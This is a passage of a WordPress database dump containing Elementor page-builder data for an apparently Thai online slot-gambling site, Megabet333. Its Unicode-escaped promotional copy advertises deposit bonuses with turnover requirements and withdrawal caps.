\\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19:<\\/strong> 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19:<\\/strong> 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(440,77,'_elementor_edit_mode','builder'),(441,77,'_elementor_template_type','wp-page'),(442,77,'_elementor_version','3.32.5'),(443,77,'_elementor_pro_version','3.32.3'),(444,77,'_wp_page_template','default'),(445,77,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(446,77,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19:<\\/strong> 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19:<\\/strong> 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(449,78,'_elementor_edit_mode','builder'),(450,78,'_elementor_template_type','wp-page'),(451,78,'_elementor_version','3.32.5'),(452,78,'_elementor_pro_version','3.32.3'),(453,78,'_wp_page_template','default'),(454,78,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(455,78,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 